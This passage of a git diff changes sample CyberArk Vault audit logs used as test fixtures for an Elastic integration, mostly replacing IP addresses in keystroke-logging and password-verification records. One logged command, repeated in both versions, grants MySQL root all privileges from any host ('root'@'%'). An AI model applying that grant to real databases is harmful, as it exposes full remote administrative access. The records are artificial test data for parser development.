logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=81.32.170.205;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} -<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-34.123.103.115-testark\n 34.71.250.247\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-34.123.103.115-testark","Station":"34.71.250.247","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=34.123.103.115;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=81.32.170.205;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"34.123.103.115"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-14T13:49:49Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 14 06:49:49\n 2021-03-14T13:49:49Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 14 06:49:49","IsoTimestamp":"2021-03-14T13:49:49Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=d284c268-2ba0-4366-af52-e33459b073a1;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=10T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615729572"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:32:04Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:32:04\n 2021-03-15T10:32:04Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:32:04","IsoTimestamp":"2021-03-15T10:32:04Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=29f340df-89e9-405a-beae-0216390cda42;SrcHost=67.43.156.13;SSHOffset=1312B;User=testark;VIDOffset=6T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:33:47Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:33:47\n 2021-03-15T10:33:47Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:33:47","IsoTimestamp":"2021-03-15T10:33:47Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=f1654cf8-8ce5-472a-8205-ba731b0fab46;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T10:35:08Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 03:35:08\n 2021-03-15T10:35:08Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 03:35:08","IsoTimestamp":"2021-03-15T10:35:08Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=8b3d0b38-aef5-49d9-bdd7-d57706887d8b;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=7T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"CPMStatus","Value":"success"},{"Name":"RetriesCount","Value":"-1"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} +<5>1 2021-03-15T14:11:18Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:11:18\n 2021-03-15T14:11:18Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:11:18","IsoTimestamp":"2021-03-15T14:11:18Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=sudo su;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=1309B;User=testark;VIDOffset=8T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814025"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} +<5>1 2021-03-15T14:45:51Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 07:45:51\n 2021-03-15T14:45:51Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 361\n Keystroke logging\n Info\n Administrator\n Keystroke logging\n \n \n partner\n Root\\Operating System-UnixSSH-67.43.156.15-testark\n 67.43.156.15\n \n \n \n \n Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;\n Keystroke logging\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 07:45:51","IsoTimestamp":"2021-03-15T14:45:51Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"361","Desc":"Keystroke logging","Severity":"Info","Issuer":"Administrator","Action":"Keystroke logging","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-UnixSSH-67.43.156.15-testark","Station":"67.43.156.15","Location":"","Category":"","RequestId":"","Reason":"","ExtraDetails":"Command=(reverse-i-search)`grant': grant all privileges on *.* TO 'root'@'%' with grant option\\;;ConnectionComponentId=PSMP-SSH;DstHost=67.43.156.15;ManagedAccount=Yes;Protocol=SSH;PSMID=PSMServer;SessionID=27f74dce-f5d5-4c94-bf99-ca6aafe2c518;SrcHost=67.43.156.13;SSHOffset=296291B;User=testark;VIDOffset=2081T;","Message":"Keystroke logging","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"UnixSSH"},{"Name":"UserName","Value":"testark"},{"Name":"Address","Value":"67.43.156.15"},{"Name":"ResetImmediately","Value":"ReconcileTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"1"},{"Name":"LastFailDate","Value":"1615819476"},{"Name":"LastTask","Value":"ReconcileTask"},{"Name":"LastSuccessVerification","Value":"1615803764"},{"Name":"CPMErrorDetails","Value":"First login - Reconcile account is not set or password is empty. Please link reconcile account to the target account or set the password. code: 8031"},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"},{"Name":"UseSudoOnReconcile","Value":"Yes"}]}}}} diff --git a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log index 211d487b613..29e2a66545c 100644 --- a/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log +++ b/packages/cyberarkpas/_dev/deploy/docker/sample_logs/audit/38_cpm_verify_password_failed.log @@ -1,8 +1,8 @@ -<7>1 2021-03-15T13:19:58Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:19:58\n 2021-03-15T13:19:58Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n\n address=34.66.114.180;username=ELASTIC\\bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:19:58","IsoTimestamp":"2021-03-15T13:19:58Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). \n","ExtraDetails":"address=34.66.114.180;username=ELASTIC\\bart;","Message":"CPM Verify Password Failed","GatewayStation":"","CAProperties":{"CAProperty":[{"Name":"PolicyID","Value":"WinDomain"},{"Name":"UserName","Value":"ELASTIC\\bart"},{"Name":"Address","Value":"34.66.114.180"},{"Name":"ResetImmediately","Value":"VerifyTask"},{"Name":"CPMStatus","Value":"failure"},{"Name":"RetriesCount","Value":"0"},{"Name":"LastFailDate","Value":"1615814397"},{"Name":"LastTask","Value":"VerifyTask"},{"Name":"LogonDomain","Value":"34.66.114.180"},{"Name":"CPMErrorDetails","Value":"Error in verifypass to user 34.66.114.180\\ELASTIC\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The specified username is invalid. (winRc=2202). "},{"Name":"CreationMethod","Value":"PVWA"},{"Name":"DeviceType","Value":"Operating System"}]}}}} -<7>1 2021-03-15T13:25:32Z VAULT {"format":"elastic","version":"1.0","raw":"\n\n \n yes\n Mar 15 06:25:32\n 2021-03-15T13:25:32Z\n VAULT\n Cyber-Ark\n Vault\n 11.7.0000\n 38\n CPM Verify Password Failed\n Error\n PasswordManager\n CPM Verify Password Failed\n \n \n partner\n Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart\n 10.0.1.20\n \n \n \n ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n\n address=34.66.114.180;username=bart;\n CPM Verify Password Failed\n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n \n\n","syslog":{"audit_record":{"Rfc5424":"yes","Timestamp":"Mar 15 06:25:32","IsoTimestamp":"2021-03-15T13:25:32Z","Hostname":"VAULT","Vendor":"Cyber-Ark","Product":"Vault","Version":"11.7.0000","MessageID":"38","Desc":"CPM Verify Password Failed","Severity":"Error","Issuer":"PasswordManager","Action":"CPM Verify Password Failed","SourceUser":"","TargetUser":"","Safe":"partner","File":"Root\\Operating System-WinDomain-35.192.121.42-ELASTICbart","Station":"10.0.1.20","Location":"","Category":"","RequestId":"","Reason":"ImmediateTask. Failure Description: CACPM344E Verifying Master Safe: partner, Folder: Root, Object: Operating System-WinDomain-35.192.121.42-ELASTICbart failed (try #0). Code: 2101, Error: Error in verifypass to user 34.66.114.180\\bart on domain 34.66.114.180(\\\\34.66.114.180). Reason: The network name cannot be found. (winRc=67). \n","ExtraDetails":"address=34.66.114.180;username=bart;","Message":"CPM Verify Password 